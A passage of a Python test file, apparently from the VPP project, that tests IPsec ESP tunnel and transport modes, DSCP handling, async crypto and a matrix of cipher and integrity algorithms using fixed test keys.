params.tra_sa_out = VppIpsecSA(self, vpp_tra_sa_id, vpp_tra_spi,
auth_algo_vpp_id, auth_key,
crypt_algo_vpp_id, crypt_key,
self.vpp_esp_protocol,
flags=flags,
salt=salt)
objs.append(params.tra_sa_in)
objs.append(params.tra_sa_out)
objs.append(VppIpsecSpdEntry(self, self.tra_spd, vpp_tra_sa_id,
addr_any, addr_bcast,
addr_any, addr_bcast,
socket.IPPROTO_ESP))
objs.append(VppIpsecSpdEntry(self, self.tra_spd, vpp_tra_sa_id,
addr_any, addr_bcast,
addr_any, addr_bcast,
socket.IPPROTO_ESP,
is_outbound=0))
objs.append(VppIpsecSpdEntry(self, self.tra_spd, vpp_tra_sa_id,
self.tra_if.local_addr[addr_type],
self.tra_if.local_addr[addr_type],
self.tra_if.remote_addr[addr_type],
self.tra_if.remote_addr[addr_type],
0, priority=10,
policy=e.IPSEC_API_SPD_ACTION_PROTECT,
is_outbound=0))
objs.append(VppIpsecSpdEntry(self, self.tra_spd, scapy_tra_sa_id,
self.tra_if.local_addr[addr_type],
self.tra_if.local_addr[addr_type],
self.tra_if.remote_addr[addr_type],
self.tra_if.remote_addr[addr_type],
0, policy=e.IPSEC_API_SPD_ACTION_PROTECT,
priority=10))
for o in objs:
o.add_vpp_config()
self.net_objs = self.net_objs + objs
class TemplateIpsecEsp(ConfigIpsecESP):
"""
Basic test for ipsec esp sanity - tunnel and transport modes.
Below 4 cases are covered as part of this test
1) ipsec esp v4 transport basic test - IPv4 Transport mode
scenario using HMAC-SHA1-96 integrity algo
2) ipsec esp v4 transport burst test
Above test for 257 pkts
3) ipsec esp 4o4 tunnel basic test - IPv4 Tunnel mode
scenario using HMAC-SHA1-96 integrity algo
4) ipsec esp 4o4 tunnel burst test
Above test for 257 pkts
TRANSPORT MODE:
--- encrypt ---
|pg2| <-------> |VPP|
--- decrypt ---
TUNNEL MODE:
--- encrypt --- plain ---
|pg0| <------- |VPP| <------ |pg1|
--- --- ---
--- decrypt --- plain ---
|pg0| -------> |VPP| ------> |pg1|
--- --- ---
"""
@classmethod
def setUpClass(cls):
super(TemplateIpsecEsp, cls).setUpClass()
@classmethod
def tearDownClass(cls):
super(TemplateIpsecEsp, cls).tearDownClass()
def setUp(self):
super(TemplateIpsecEsp, self).setUp()
self.config_network(self.params.values())
def tearDown(self):
self.unconfig_network()
super(TemplateIpsecEsp, self).tearDown()
class TestIpsecEsp1(TemplateIpsecEsp, IpsecTra46Tests,
IpsecTun46Tests, IpsecTra6ExtTests):
""" Ipsec ESP - TUN & TRA tests """
@classmethod
def setUpClass(cls):
super(TestIpsecEsp1, cls).setUpClass()
@classmethod
def tearDownClass(cls):
super(TestIpsecEsp1, cls).tearDownClass()
def setUp(self):
super(TestIpsecEsp1, self).setUp()
def tearDown(self):
super(TestIpsecEsp1, self).tearDown()
def test_tun_46(self):
""" ipsec 4o6 tunnel """
# add an SPD entry to direct 2.2.2.2 to the v6 tunnel SA
p6 = self.ipv6_params
p4 = self.ipv4_params
p6.remote_tun_if_host4 = "2.2.2.2"
e = VppEnum.vl_api_ipsec_spd_action_t
VppIpsecSpdEntry(self,
self.tun_spd,
p6.scapy_tun_sa_id,
self.pg1.remote_addr[p4.addr_type],
self.pg1.remote_addr[p4.addr_type],
p6.remote_tun_if_host4,
p6.remote_tun_if_host4,
0,
priority=10,
policy=e.IPSEC_API_SPD_ACTION_PROTECT,
is_outbound=1).add_vpp_config()
VppIpRoute(self, p6.remote_tun_if_host4, p4.addr_len,
[VppRoutePath(self.tun_if.remote_addr[p4.addr_type],
0xffffffff)]).add_vpp_config()
old_name = self.tun6_encrypt_node_name
self.tun6_encrypt_node_name = "esp4-encrypt"
self.verify_tun_46(p6, count=63)
self.tun6_encrypt_node_name = old_name
def test_tun_64(self):
""" ipsec 6o4 tunnel """
# add an SPD entry to direct 4444::4 to the v4 tunnel SA
p6 = self.ipv6_params
p4 = self.ipv4_params
p4.remote_tun_if_host6 = "4444::4"
e = VppEnum.vl_api_ipsec_spd_action_t
VppIpsecSpdEntry(self,
self.tun_spd,
p4.scapy_tun_sa_id,
self.pg1.remote_addr[p6.addr_type],
self.pg1.remote_addr[p6.addr_type],
p4.remote_tun_if_host6,
p4.remote_tun_if_host6,
0,
priority=10,
policy=e.IPSEC_API_SPD_ACTION_PROTECT,
is_outbound=1).add_vpp_config()
d = DpoProto.DPO_PROTO_IP6
VppIpRoute(self, p4.remote_tun_if_host6, p6.addr_len,
[VppRoutePath(self.tun_if.remote_addr[p6.addr_type],
0xffffffff,
proto=d)]).add_vpp_config()
old_name = self.tun4_encrypt_node_name
self.tun4_encrypt_node_name = "esp6-encrypt"
self.verify_tun_64(p4, count=63)
self.tun4_encrypt_node_name = old_name
class TestIpsecEspTun(TemplateIpsecEsp, IpsecTun46Tests):
""" Ipsec ESP - TUN encap tests """
def setUp(self):
self.ipv4_params = IPsecIPv4Params()
self.ipv6_params = IPsecIPv6Params()
c = (VppEnum.vl_api_tunnel_encap_decap_flags_t.
TUNNEL_API_ENCAP_DECAP_FLAG_ENCAP_COPY_DSCP)
c1 = c | (VppEnum.vl_api_tunnel_encap_decap_flags_t.
TUNNEL_API_ENCAP_DECAP_FLAG_ENCAP_COPY_ECN)
self.ipv4_params.tun_flags = c
self.ipv6_params.tun_flags = c1
super(TestIpsecEspTun, self).setUp()
def gen_pkts(self, sw_intf, src, dst, count=1, payload_size=54):
# set the DSCP + ECN - flags are set to copy only DSCP
return [Ether(src=sw_intf.remote_mac, dst=sw_intf.local_mac) /
IP(src=src, dst=dst, tos=5) /
UDP(sport=4444, dport=4444) /
Raw(b'X' * payload_size)
for i in range(count)]
def gen_pkts6(self, p, sw_intf, src, dst, count=1, payload_size=54):
# set the DSCP + ECN - flags are set to copy both
return [Ether(src=sw_intf.remote_mac, dst=sw_intf.local_mac) /
IPv6(src=src, dst=dst, tc=5) /
UDP(sport=4444, dport=4444) /
Raw(b'X' * payload_size)
for i in range(count)]
def verify_encrypted(self, p, sa, rxs):
# just check that only the DSCP is copied
for rx in rxs:
self.assertEqual(rx[IP].tos, 4)
def verify_encrypted6(self, p, sa, rxs):
# just check that the DSCP & ECN are copied
for rx in rxs:
self.assertEqual(rx[IPv6].tc, 5)
class TestIpsecEspTun2(TemplateIpsecEsp, IpsecTun46Tests):
""" Ipsec ESP - TUN DSCP tests """
def setUp(self):
self.ipv4_params = IPsecIPv4Params()
self.ipv6_params = IPsecIPv6Params()
self.ipv4_params.dscp = VppEnum.vl_api_ip_dscp_t.IP_API_DSCP_EF
self.ipv6_params.dscp = VppEnum.vl_api_ip_dscp_t.IP_API_DSCP_AF11
super(TestIpsecEspTun2, self).setUp()
def gen_pkts(self, sw_intf, src, dst, count=1, payload_size=54):
return [Ether(src=sw_intf.remote_mac, dst=sw_intf.local_mac) /
IP(src=src, dst=dst) /
UDP(sport=4444, dport=4444) /
Raw(b'X' * payload_size)
for i in range(count)]
def gen_pkts6(self, p, sw_intf, src, dst, count=1, payload_size=54):
return [Ether(src=sw_intf.remote_mac, dst=sw_intf.local_mac) /
IPv6(src=src, dst=dst) /
UDP(sport=4444, dport=4444) /
Raw(b'X' * payload_size)
for i in range(count)]
def verify_encrypted(self, p, sa, rxs):
# just check that only the DSCP is set
for rx in rxs:
self.assertEqual(rx[IP].tos,
VppEnum.vl_api_ip_dscp_t.IP_API_DSCP_EF << 2)
def verify_encrypted6(self, p, sa, rxs):
# just check that the DSCP is set
for rx in rxs:
self.assertEqual(rx[IPv6].tc,
VppEnum.vl_api_ip_dscp_t.IP_API_DSCP_AF11 << 2)
class TestIpsecEsp2(TemplateIpsecEsp, IpsecTcpTests):
""" Ipsec ESP - TCP tests """
pass
class TestIpsecEspAsync(TemplateIpsecEsp):
""" Ipsec ESP - Aysnc tests """
vpp_worker_count = 2
def setUp(self):
super(TestIpsecEspAsync, self).setUp()
self.p_sync = IPsecIPv4Params()
self.p_sync.crypt_algo_vpp_id = (VppEnum.vl_api_ipsec_crypto_alg_t.
IPSEC_API_CRYPTO_ALG_AES_CBC_256)
self.p_sync.crypt_algo = 'AES-CBC' # scapy name
self.p_sync.crypt_key = b'JPjyOWBeVEQiMe7hJPjyOWBeVEQiMe7h'
self.p_sync.scapy_tun_sa_id += 0xf0000
self.p_sync.scapy_tun_spi += 0xf0000
self.p_sync.vpp_tun_sa_id += 0xf0000
self.p_sync.vpp_tun_spi += 0xf0000
self.p_sync.remote_tun_if_host = "2.2.2.2"
e = VppEnum.vl_api_ipsec_spd_action_t
self.p_sync.sa = VppIpsecSA(
self,
self.p_sync.vpp_tun_sa_id,
self.p_sync.vpp_tun_spi,
self.p_sync.auth_algo_vpp_id,
self.p_sync.auth_key,
self.p_sync.crypt_algo_vpp_id,
self.p_sync.crypt_key,
self.vpp_esp_protocol,
self.tun_if.local_addr[self.p_sync.addr_type],
self.tun_if.remote_addr[self.p_sync.addr_type]).add_vpp_config()
self.p_sync.spd = VppIpsecSpdEntry(
self,
self.tun_spd,
self.p_sync.vpp_tun_sa_id,
self.pg1.remote_addr[self.p_sync.addr_type],
self.pg1.remote_addr[self.p_sync.addr_type],
self.p_sync.remote_tun_if_host,
self.p_sync.remote_tun_if_host,
0,
priority=1,
policy=e.IPSEC_API_SPD_ACTION_PROTECT,
is_outbound=1).add_vpp_config()
VppIpRoute(self,
self.p_sync.remote_tun_if_host,
self.p_sync.addr_len,
[VppRoutePath(
self.tun_if.remote_addr[self.p_sync.addr_type],
0xffffffff)]).add_vpp_config()
config_tun_params(self.p_sync, self.encryption_type, self.tun_if)
self.p_async = IPsecIPv4Params()
self.p_async.crypt_algo_vpp_id = (VppEnum.vl_api_ipsec_crypto_alg_t.
IPSEC_API_CRYPTO_ALG_AES_GCM_256)
self.p_async.auth_algo_vpp_id = (VppEnum.vl_api_ipsec_integ_alg_t.
IPSEC_API_INTEG_ALG_NONE)
self.p_async.crypt_algo = 'AES-GCM' # scapy name
self.p_async.crypt_key = b'JPjyOWBeVEQiMe7hJPjyOWBeVEQiMe7h'
self.p_async.auth_algo = 'NULL'
self.p_async.scapy_tun_sa_id += 0xe0000
self.p_async.scapy_tun_spi += 0xe0000
self.p_async.vpp_tun_sa_id += 0xe0000
self.p_async.vpp_tun_spi += 0xe0000
self.p_async.remote_tun_if_host = "2.2.2.3"
iflags = VppEnum.vl_api_ipsec_sad_flags_t
self.p_async.flags = (iflags.IPSEC_API_SAD_FLAG_USE_ESN |
iflags.IPSEC_API_SAD_FLAG_USE_ANTI_REPLAY |
iflags.IPSEC_API_SAD_FLAG_ASYNC)
self.p_async.sa = VppIpsecSA(
self,
self.p_async.vpp_tun_sa_id,
self.p_async.vpp_tun_spi,
self.p_async.auth_algo_vpp_id,
self.p_async.auth_key,
self.p_async.crypt_algo_vpp_id,
self.p_async.crypt_key,
self.vpp_esp_protocol,
self.tun_if.local_addr[self.p_async.addr_type],
self.tun_if.remote_addr[self.p_async.addr_type],
flags=self.p_async.flags).add_vpp_config()
self.p_async.spd = VppIpsecSpdEntry(
self,
self.tun_spd,
self.p_async.vpp_tun_sa_id,
self.pg1.remote_addr[self.p_async.addr_type],
self.pg1.remote_addr[self.p_async.addr_type],
self.p_async.remote_tun_if_host,
self.p_async.remote_tun_if_host,
0,
priority=2,
policy=e.IPSEC_API_SPD_ACTION_PROTECT,
is_outbound=1).add_vpp_config()
VppIpRoute(self,
self.p_async.remote_tun_if_host,
self.p_async.addr_len,
[VppRoutePath(
self.tun_if.remote_addr[self.p_async.addr_type],
0xffffffff)]).add_vpp_config()
config_tun_params(self.p_async, self.encryption_type, self.tun_if)
def test_dual_stream(self):
""" Alternating SAs """
p = self.params[self.p_sync.addr_type]
self.vapi.ipsec_set_async_mode(async_enable=True)
pkts = [(Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4,
dst=self.p_sync.remote_tun_if_host) /
UDP(sport=4444, dport=4444) /
Raw(b'0x0' * 200)),
(Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4,
dst=p.remote_tun_if_host) /
UDP(sport=4444, dport=4444) /
Raw(b'0x0' * 200))]
pkts *= 1023
rxs = self.send_and_expect(self.pg1, pkts, self.pg0)
self.assertEqual(len(rxs), len(pkts))
for rx in rxs:
if rx[ESP].spi == p.scapy_tun_spi:
decrypted = p.vpp_tun_sa.decrypt(rx[IP])
elif rx[ESP].spi == self.p_sync.vpp_tun_spi:
decrypted = self.p_sync.scapy_tun_sa.decrypt(rx[IP])
else:
rx.show()
self.assertTrue(False)
self.p_sync.spd.remove_vpp_config()
self.p_sync.sa.remove_vpp_config()
self.p_async.spd.remove_vpp_config()
self.p_async.sa.remove_vpp_config()
self.vapi.ipsec_set_async_mode(async_enable=False)
def test_sync_async_noop_stream(self):
""" Alternating SAs sync/async/noop """
p = self.params[self.p_sync.addr_type]
# first pin the default/noop SA to worker 0
pkts = [(Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4,
dst=p.remote_tun_if_host) /
UDP(sport=4444, dport=4444) /
Raw(b'0x0' * 200))]
rxs = self.send_and_expect(self.pg1, pkts, self.pg0, worker=0)
self.logger.info(self.vapi.cli("sh ipsec sa"))
self.logger.info(self.vapi.cli("sh crypto async status"))
# then use all the other SAs on worker 1.
# some will handoff, other take the sync and async paths
pkts = [(Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4,
dst=self.p_sync.remote_tun_if_host) /
UDP(sport=4444, dport=4444) /
Raw(b'0x0' * 200)),
(Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4,
dst=p.remote_tun_if_host) /
UDP(sport=4444, dport=4444) /
Raw(b'0x0' * 200)),
(Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4,
dst=self.p_async.remote_tun_if_host) /
UDP(sport=4444, dport=4444) /
Raw(b'0x0' * 200))]
pkts *= 1023
rxs = self.send_and_expect(self.pg1, pkts, self.pg0, worker=1)
self.assertEqual(len(rxs), len(pkts))
for rx in rxs:
if rx[ESP].spi == p.scapy_tun_spi:
decrypted = p.vpp_tun_sa.decrypt(rx[IP])
elif rx[ESP].spi == self.p_sync.vpp_tun_spi:
decrypted = self.p_sync.scapy_tun_sa.decrypt(rx[IP])
elif rx[ESP].spi == self.p_async.vpp_tun_spi:
decrypted = self.p_async.scapy_tun_sa.decrypt(rx[IP])
else:
rx.show()
self.assertTrue(False)
self.p_sync.spd.remove_vpp_config()
self.p_sync.sa.remove_vpp_config()
self.p_async.spd.remove_vpp_config()
self.p_async.sa.remove_vpp_config()
# async mode should have been disabled now that there are
# no async SAs. there's no API for this, so a reluctant
# screen scrape.
self.assertTrue("DISABLED" in self.vapi.cli("sh crypto async status"))
class TestIpsecEspHandoff(TemplateIpsecEsp,
IpsecTun6HandoffTests,
IpsecTun4HandoffTests):
""" Ipsec ESP - handoff tests """
pass
class TemplateIpsecEspUdp(ConfigIpsecESP):
"""
UDP encapped ESP
"""
@classmethod
def setUpClass(cls):
super(TemplateIpsecEspUdp, cls).setUpClass()
@classmethod
def tearDownClass(cls):
super(TemplateIpsecEspUdp, cls).tearDownClass()
def setUp(self):
super(TemplateIpsecEspUdp, self).setUp()
self.net_objs = []
self.tun_if = self.pg0
self.tra_if = self.pg2
self.logger.info(self.vapi.ppcli("show int addr"))
p = self.ipv4_params
p.flags = (VppEnum.vl_api_ipsec_sad_flags_t.
IPSEC_API_SAD_FLAG_UDP_ENCAP)
p.nat_header = UDP(sport=5454, dport=4500)
self.tra_spd = VppIpsecSpd(self, self.tra_spd_id)
self.tra_spd.add_vpp_config()
VppIpsecSpdItfBinding(self, self.tra_spd,
self.tra_if).add_vpp_config()
self.config_esp_tra(p)
config_tra_params(p, self.encryption_type)
self.tun_spd = VppIpsecSpd(self, self.tun_spd_id)
self.tun_spd.add_vpp_config()
VppIpsecSpdItfBinding(self, self.tun_spd,
self.tun_if).add_vpp_config()
self.config_esp_tun(p)
self.logger.info(self.vapi.ppcli("show ipsec all"))
d = DpoProto.DPO_PROTO_IP4
VppIpRoute(self, p.remote_tun_if_host, p.addr_len,
[VppRoutePath(self.tun_if.remote_addr[p.addr_type],
0xffffffff,
proto=d)]).add_vpp_config()
def tearDown(self):
super(TemplateIpsecEspUdp, self).tearDown()
def show_commands_at_teardown(self):
self.logger.info(self.vapi.cli("show hardware"))
class TestIpsecEspUdp(TemplateIpsecEspUdp, IpsecTra4Tests):
""" Ipsec NAT-T ESP UDP tests """
pass
class MyParameters():
def __init__(self):
flag_esn = VppEnum.vl_api_ipsec_sad_flags_t.IPSEC_API_SAD_FLAG_USE_ESN
self.flags = [0, flag_esn]
# foreach crypto algorithm
self.algos = {
'AES-GCM-128/NONE': {
'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
IPSEC_API_CRYPTO_ALG_AES_GCM_128),
'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
IPSEC_API_INTEG_ALG_NONE),
'scapy-crypto': "AES-GCM",
'scapy-integ': "NULL",
'key': b"JPjyOWBeVEQiMe7h",
'salt': 0},
'AES-GCM-192/NONE': {
'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
IPSEC_API_CRYPTO_ALG_AES_GCM_192),
'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
IPSEC_API_INTEG_ALG_NONE),
'scapy-crypto': "AES-GCM",
'scapy-integ': "NULL",
'key': b"JPjyOWBeVEQiMe7h01234567",
'salt': 1010},
'AES-GCM-256/NONE': {
'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
IPSEC_API_CRYPTO_ALG_AES_GCM_256),
'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
IPSEC_API_INTEG_ALG_NONE),
'scapy-crypto': "AES-GCM",
'scapy-integ': "NULL",
'key': b"JPjyOWBeVEQiMe7h0123456787654321",
'salt': 2020},
'AES-CBC-128/MD5-96': {
'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
IPSEC_API_CRYPTO_ALG_AES_CBC_128),
'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
IPSEC_API_INTEG_ALG_MD5_96),
'scapy-crypto': "AES-CBC",
'scapy-integ': "HMAC-MD5-96",
'salt': 0,
'key': b"JPjyOWBeVEQiMe7h"},
'AES-CBC-192/SHA1-96': {
'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
IPSEC_API_CRYPTO_ALG_AES_CBC_192),
'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
IPSEC_API_INTEG_ALG_SHA1_96),
'scapy-crypto': "AES-CBC",
'scapy-integ': "HMAC-SHA1-96",
'salt': 0,
'key': b"JPjyOWBeVEQiMe7hJPjyOWBe"},
'AES-CBC-256/SHA1-96': {
'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
IPSEC_API_CRYPTO_ALG_AES_CBC_256),
'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
IPSEC_API_INTEG_ALG_SHA1_96),
'scapy-crypto': "AES-CBC",
'scapy-integ': "HMAC-SHA1-96",
'salt': 0,
'key': b"JPjyOWBeVEQiMe7hJPjyOWBeVEQiMe7h"},
'3DES-CBC/SHA1-96': {
'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
IPSEC_API_CRYPTO_ALG_3DES_CBC),
'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
IPSEC_API_INTEG_ALG_SHA1_96),
'scapy-crypto': "3DES",
'scapy-integ': "HMAC-SHA1-96",
'salt': 0,
'key': b"JPjyOWBeVEQiMe7h00112233"},
'NONE/SHA1-96': {
'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
IPSEC_API_CRYPTO_ALG_NONE),
'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
IPSEC_API_INTEG_ALG_SHA1_96),
'scapy-crypto': "NULL",
'scapy-integ': "HMAC-SHA1-96",
'salt': 0,
'key': b"JPjyOWBeVEQiMe7h00112233"},
'AES-CTR-128/SHA1-96': {
'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
IPSEC_API_CRYPTO_ALG_AES_CTR_128),
'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
IPSEC_API_INTEG_ALG_SHA1_96),
'scapy-crypto': "AES-CTR",
'scapy-integ': "HMAC-SHA1-96",
'salt': 0,
'key': b"JPjyOWBeVEQiMe7h"},
'AES-CTR-192/SHA1-96': {
'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
IPSEC_API_CRYPTO_ALG_AES_CTR_192),
'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
IPSEC_API_INTEG_ALG_SHA1_96),
'scapy-crypto': "AES-CTR",
'scapy-integ': "HMAC-SHA1-96",
'salt': 1010,
'key': b"JPjyOWBeVEQiMe7hJPjyOWBe"},
'AES-CTR-256/SHA1-96': {
'vpp-crypto': (VppEnum.vl_api_ipsec_crypto_alg_t.
IPSEC_API_CRYPTO_ALG_AES_CTR_256),
'vpp-integ': (VppEnum.vl_api_ipsec_integ_alg_t.
IPSEC_API_INTEG_ALG_SHA1_96),
'scapy-crypto': "AES-CTR",
'scapy-integ': "HMAC-SHA1-96",
'salt': 2020,
'key': b"JPjyOWBeVEQiMe7hJPjyOWBeVEQiMe7h"}}
class RunTestIpsecEspAll(ConfigIpsecESP,
IpsecTra4, IpsecTra6,
IpsecTun4, IpsecTun6):
""" Ipsec ESP all Algos """
@classmethod
def setUpConstants(cls):
test_args = str.split(cls.__doc__, " ")
engine = test_args[0]
if engine == "async":
cls.vpp_worker_count = 2
super(RunTestIpsecEspAll, cls).setUpConstants()
def setUp(self):
super(RunTestIpsecEspAll, self).setUp()
test_args = str.split(self.__doc__, " ")
params = MyParameters()
self.engine = test_args[0]
self.flag = params.flags[0]
if test_args[1] == 'ESN':
self.flag = params.flags[1]
self.algo = params.algos[test_args[2]]
self.async_mode = False
if self.engine == "async":
self.async_mode = True
def tearDown(self):
super(RunTestIpsecEspAll, self).tearDown()
def run_test(self):
self.run_a_test(self.engine, self.flag, self.algo)
def run_a_test(self, engine, flag, algo, payload_size=None):
if self.async_mode:
self.vapi.cli("set ipsec async mode on")
else:
self.vapi.cli("set crypto handler all %s" % engine)
self.logger.info(self.vapi.cli("show crypto async status"))
self.ipv4_params = IPsecIPv4Params()
self.ipv6_params = IPsecIPv6Params()
self.params = {self.ipv4_params.addr_type:
self.ipv4_params,
self.ipv6_params.addr_type:
self.ipv6_params}
for _, p in self.params.items():
p.auth_algo_vpp_id = algo['vpp-integ']
p.crypt_algo_vpp_id = algo['vpp-crypto']
p.crypt_algo = algo['scapy-crypto']
p.auth_algo = algo['scapy-integ']
p.crypt_key = algo['key']
p.salt = algo['salt']
p.flags = p.flags | flag
p.outer_flow_label = 243224
p.async_mode = self.async_mode
self.reporter.send_keep_alive(self)
#
# configure the SPDs. SAs, etc
#
self.config_network(self.params.values())
#
# run some traffic.
# An exhautsive 4o6, 6o4 is not necessary
# for each algo
#
self.verify_tra_basic6(count=NUM_PKTS)
self.verify_tra_basic4(count=NUM_PKTS)
self.verify_tun_66(self.params[socket.AF_INET6],
count=NUM_PKTS)
#
# Use an odd-byte payload size to check for correct padding.
#
# 49 + 2 == 51 which should pad +1 to 52 for 4 byte alignment, +5
# to 56 for 8 byte alignment, and +13 to 64 for 64 byte alignment.
# This should catch bugs where the code is incorrectly over-padding
# for algorithms that don't require it
psz = 49 - len(IP()/ICMP()) if payload_size is None else payload_size
self.verify_tun_44(self.params[socket.AF_INET],
count=NUM_PKTS, payload_size=psz)
LARGE_PKT_SZ = [
1970, # results in 2 chained buffers entering decrypt node
# but leaving as simple buffer due to ICV removal (tra4)
2004, # footer+ICV will be added to 2nd buffer (tun4)
4010, # ICV ends up splitted accross 2 buffers in esp_decrypt
# for transport4; transport6 takes normal path
4020, # same as above but tra4 and tra6 are switched
]
if self.engine in engines_supporting_chain_bufs:
for sz in LARGE_PKT_SZ:
self.verify_tra_basic4(count=NUM_PKTS, payload_size=sz)
self.verify_tra_basic6(count=NUM_PKTS, payload_size=sz)
self.verify_tun_66(self.params[socket.AF_INET6],
count=NUM_PKTS, payload_size=sz)
self.verify_tun_44(self.params[socket.AF_INET],
count=NUM_PKTS, payload_size=sz)
#
# swap the handlers while SAs are up
#
for e in engines:
if e != engine:
self.vapi.cli("set crypto handler all %s" % e)
self.verify_tra_basic4(count=NUM_PKTS)
#
# remove the SPDs, SAs, etc
#
self.unconfig_network()
#
# reconfigure the network and SA to run the
# anti replay tests
#
self.config_network(self.params.values())
self.verify_tra_anti_replay()
self.unconfig_network()
#
# To generate test classes, do:
# grep '# GEN' test_ipsec_esp.py | sed -e 's/# GEN //g' | bash
#
# GEN for ENG in native ipsecmb openssl; do \
# GEN for FLG in noESN ESN; do for ALG in AES-GCM-128/NONE \
# GEN AES-GCM-192/NONE AES-GCM-256/NONE AES-CBC-128/MD5-96 \
# GEN AES-CBC-192/SHA1-96 AES-CBC-256/SHA1-96 \
# GEN 3DES-CBC/SHA1-96 NONE/SHA1-96 \
# GEN AES-CTR-128/SHA1-96 AES-CTR-192/SHA1-96 AES-CTR-256/SHA1-96; do \
# GEN [[ ${FLG} == "ESN" && ${ALG} == *"NONE" ]] && continue
# GEN echo -e "\n\nclass Test_${ENG}_${FLG}_${ALG}(RunTestIpsecEspAll):" |
# GEN sed -e 's/-/_/g' -e 's#/#_#g' ; \
# GEN echo ' """'$ENG $FLG $ALG IPSec test'"""' ;
# GEN echo " def test_ipsec(self):";
# GEN echo " self.run_test()";
# GEN done; done; done
#
# GEN for FLG in noESN ESN; do for ALG in \
# GEN AES-GCM-128/NONE AES-GCM-192/NONE AES-GCM-256/NONE \
# GEN AES-CBC-192/SHA1-96 AES-CBC-256/SHA1-96; do \
# GEN [[ ${FLG} == "ESN" && ${ALG} == *"NONE" ]] && continue
# GEN echo -e "\n\nclass Test_async_${FLG}_${ALG}(RunTestIpsecEspAll):" |
# GEN sed -e 's/-/_/g' -e 's#/#_#g' ; \
# GEN echo ' """'async $FLG $ALG IPSec test'"""' ;
# GEN echo " def test_ipsec(self):";
# GEN echo " self.run_test()";
# GEN done; done;
class Test_native_noESN_AES_GCM_128_NONE(RunTestIpsecEspAll):
"""native noESN AES-GCM-128/NONE IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_native_noESN_AES_GCM_192_NONE(RunTestIpsecEspAll):
"""native noESN AES-GCM-192/NONE IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_native_noESN_AES_GCM_256_NONE(RunTestIpsecEspAll):
"""native noESN AES-GCM-256/NONE IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_native_noESN_AES_CBC_128_MD5_96(RunTestIpsecEspAll):
"""native noESN AES-CBC-128/MD5-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_native_noESN_AES_CBC_192_SHA1_96(RunTestIpsecEspAll):
"""native noESN AES-CBC-192/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_native_noESN_AES_CBC_256_SHA1_96(RunTestIpsecEspAll):
"""native noESN AES-CBC-256/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_native_noESN_3DES_CBC_SHA1_96(RunTestIpsecEspAll):
"""native noESN 3DES-CBC/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_native_noESN_NONE_SHA1_96(RunTestIpsecEspAll):
"""native noESN NONE/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_native_noESN_AES_CTR_128_SHA1_96(RunTestIpsecEspAll):
"""native noESN AES-CTR-128/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_native_noESN_AES_CTR_192_SHA1_96(RunTestIpsecEspAll):
"""native noESN AES-CTR-192/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_native_noESN_AES_CTR_256_SHA1_96(RunTestIpsecEspAll):
"""native noESN AES-CTR-256/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_native_ESN_AES_CBC_128_MD5_96(RunTestIpsecEspAll):
"""native ESN AES-CBC-128/MD5-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_native_ESN_AES_CBC_192_SHA1_96(RunTestIpsecEspAll):
"""native ESN AES-CBC-192/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_native_ESN_AES_CBC_256_SHA1_96(RunTestIpsecEspAll):
"""native ESN AES-CBC-256/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_native_ESN_3DES_CBC_SHA1_96(RunTestIpsecEspAll):
"""native ESN 3DES-CBC/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_native_ESN_NONE_SHA1_96(RunTestIpsecEspAll):
"""native ESN NONE/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_native_ESN_AES_CTR_128_SHA1_96(RunTestIpsecEspAll):
"""native ESN AES-CTR-128/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_native_ESN_AES_CTR_192_SHA1_96(RunTestIpsecEspAll):
"""native ESN AES-CTR-192/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_native_ESN_AES_CTR_256_SHA1_96(RunTestIpsecEspAll):
"""native ESN AES-CTR-256/SHA1-96 IPSec test"""
def test_ipsec(self):
self.run_test()
class Test_ipsecmb_noESN_AES_GCM_128_NONE(RunTestIpsecEspAll):
